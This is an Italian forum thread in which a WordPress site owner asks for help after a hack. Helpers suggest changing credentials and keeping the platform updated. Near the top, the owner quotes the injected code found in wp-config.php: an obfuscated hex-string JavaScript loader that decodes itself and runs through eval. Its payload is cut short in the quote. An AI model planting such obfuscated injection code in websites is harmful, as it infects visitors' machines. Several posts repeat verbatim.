ciao,
ho un sito su piattaforma Wordpress che gestisco e ho scoperto che sono stato vittima di hackers. Non potevo più accedervi a ricevevo un messaggio che diceva:

Parse error: syntax error, unexpected '<' in /home/mhd-01/wwww.xxxxx-yyyyyy.com/htdocs/wp-config.php on line 93.

Via FTP ho controllato il file wp-config.php ed ho trovato questo script:

<script type='text/javascript'>
var t="";var arr="646f63756d656e742e...2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);
</script>

L'ho cancellato e sono riuscito a visualizzare di nuovo il mio sito ma il pannello di controllo di Wordpress presenta ancora dei problemi, lo visualizzo male, con una grafica sconclusionata per cui credo che il problema non sia risolto.
Ho effettuato la procedura di pulizia indicata qui e, log di hijackthis a parte da analizzare, non mi pare ci sia nulla di particolare nel mio pc. O meglio, prima Antivir mi ha rilevato un Trojan che è stato però eliminato adesso.
Se però il mio pc fosse davvero pulito ora credo che dovrei visualizzare il pannello di controllo di Wordpress correttamente e invece non è così.

Esiste un modo per vedere se nel mio sito è stato inserito qualche altro script da altre parti? Esiste qualche programma per analizzare il mio sito nello specifico invece che il mio pc? :confused:

Grazie in anticipo, ciao! :)

P.S.
Il servizio assistenza del mio hosting mi ha risposto così: "probabilmente ha qualche script nel sito che ha dei BUG che hanno consentito la modifica della pagina. Consigliamo di fare controlli in tal senso." Appunto, come posso fare controlli in tal senso??

Ciao, sistema il tuo post sballa il layout del forum e riporta l'indirizzo del sito in modo e maniera che non sia cliccabile, grazie.

Ciao, sistema il tuo post sballa il layout del forum e riporta l'indirizzo del sito in modo e maniera che non sia cliccabile, grazie.

ciao, scusa ho editato. Se c'è ancora qualche problema fammi sapere che provvedo! :)

ciao, scusa ho editato. Se c'è ancora qualche problema fammi sapere che provvedo! :)

Tutto ok, ma hai dimenticato di riportare il sito.

Tutto ok, ma hai dimenticato di riportare il sito.

ah no, l'ho eliminato apposta pensando che non si potesse postare!
Anche perchè pensavo bastasse postare lo script fondamentalmente.

Il sito è wwww.health-bodytips.com

L'ho reso non cliccabile, fammi sapere se va bene così!

Grazie! :)

edit.

ho appena riscontrato lo stesso problema in un altro sito che ho e usavo come prova.
Siccome ho anche altri siti oltre a questi 2, notavo il fatto che, per ora, ho riscontrato questo problema con 2 blog Wordpress che hanno lo stesso hosting service. Un altro blog Wordpress che ho, con un altro hosting, per ora non presenta alcun problema di questo tipo.
Non so se c'entri l'hosting comunque ma volevo riportarlo.
Spero che qualcuno mi sappia dare una mano a capire :(

nessuno ha mai avuto problemi di questo tipo?

nessuno ha mai avuto problemi di questo tipo?

Ciao, controllato ieri, non ho visto nulla di anomalo.

Ciao, controllato ieri, non ho visto nulla di anomalo.

Ciao, grazie per la risposta!
Purtoppo il pannello di controllo del sito (wordpress) ha una grafica completamente sballata per cui penso ci sia ancora qualcosa che non va.
Ho scoperto che anche un altro blog che ho è stato attaccato ma questo sembra irrecuperabile. Se hai voglia di dargli uno sguardo è wwww.ioinformo.it.
Non riesco più ad accedere :(

grazie, ciao!

Ciao, grazie per la risposta!
Purtoppo il pannello di controllo del sito (wordpress) ha una grafica completamente sballata per cui penso ci sia ancora qualcosa che non va.
Ho scoperto che anche un altro blog che ho è stato attaccato ma questo sembra irrecuperabile. Se hai voglia di dargli uno sguardo è wwww.ioinformo.it.
Non riesco più ad accedere :(

grazie, ciao!

Nulla di anomalo, comunque la prima cosa da fare è cambiare le credenziali ed aggiornare la piattaforma su cui si appoggia il sito.

Nulla di anomalo, comunque la prima cosa da fare è cambiare le credenziali ed aggiornare la piattaforma su cui si appoggia il sito.

Ciao, la piattaforma ho provato ad aggiornarla via ftp in quanto dal pannello di controllo non si riesce.
Ho sovrascritto tutti i file tranne la cartella content e il file config.php.
Risultato: tutto come prima.
Ed ogni volta che vi accedo il mio antivirus mi blocca un trojan... :muro:
Ma c'è un modo per fare una scansione antivirus al mio sito??

Ed ogni volta che vi accedo il mio antivirus mi blocca un trojan... :muro:


Mi alleghi il log su uno dei Server remoti indicati nelle Regole di sezione in firma.

edit

Mi alleghi il log su uno dei Server remoti indicati nelle Regole di sezione in firma.

ciao, Antivir non mi dà un vero e proprio log per cui ti allego gli screenshot di ciò che ha rilevato, sperando che siano utili. :)
Grazie in anticipo!

antivir.jpg (http://wikisend.com/download/521690/antivir.jpg)

antivir_1.png (http://wikisend.com/download/532600/antivir_1.png)

ciao, Antivir non mi dà un vero e proprio log per cui ti allego gli screenshot di ciò che ha rilevato, sperando che siano utili. :)
Grazie in anticipo!

antivir.jpg (http://wikisend.com/download/521690/antivir.jpg)

antivir_1.png (http://wikisend.com/download/532600/antivir_1.png)

Parliamo di questo health-bodytips ?

Parliamo di questo health-bodytips ?

sì questi sono stati rilevati connettendomi alla homepage health-bodytips prima e al pannello admin di wordpress poi.
Per conoscenza, mi è successo in alcuni casi di ricevere gli stessi avvisi connettendomi anche all'altro sito.

nessuna novità?
Se cancello tutto via ftp e ricomincio il lavoro da zero, sono sicuro di aver tolto i virus?
Esiste un modo per evitare che qualcuno infili script nelle pagine dei siti internet?
Grazie :)

nessuna novità?
Se cancello tutto via ftp e ricomincio il lavoro da zero, sono sicuro di aver tolto i virus?
Esiste un modo per evitare che qualcuno infili script nelle pagine dei siti internet?
Grazie :)

Ricontrollato, non risulta nulla, per evitare tutto eventuali iniezioni di codice i principali accordimenti sono, password robusta e piattaforma sempre aggiornata.

Ricontrollato, non risulta nulla, per evitare tutto eventuali iniezioni di codice i principali accordimenti sono, password robusta e piattaforma sempre aggiornata.

ti ringrazio, per un altro sito ho messo una password molto complicata al database MySQL e spero basti.
Un'ultima cosa, c'è un modo in cui possa eventualmente fare io dei controlli in futuro per essere sicuro che nessuno si sia infilato nel mio sito? Giusto per non disturbarvi sempre nel forum, ogni volta che avessi un dubbio riguardo questo problema su uno dei miei siti. :)
Grazie ancora! :)